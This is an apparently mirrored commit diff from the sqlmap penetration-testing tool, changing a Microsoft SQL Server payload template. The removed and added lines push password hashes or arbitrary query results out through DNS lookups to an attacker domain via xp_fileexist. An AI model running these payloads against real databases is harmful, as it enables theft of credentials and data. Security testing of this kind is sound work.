mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2026-08-04 14:55:40 +00:00
minor update
This commit is contained in:
parent
1b072f6415
commit
9199ce5054
2 changed files with 3 additions and 4 deletions
|
|
@ -1,5 +1,3 @@
|
|||
# Reference: http://www.defcon.org/images/defcon-15/dc15-presentations/dc-15-karlsson.pdf
|
||||
|
||||
DECLARE @host varchar(1024);
|
||||
SELECT @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.%DOMAIN%' FROM sys.sql_logins;
|
||||
EXEC('xp_fileexist "\' + @host + 'c$boot.ini"');
|
||||
SELECT @host = (%QUERY%) + '.%DOMAIN%';
|
||||
EXEC('xp_fileexist "\' + @host + 'c$boot.ini"');
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue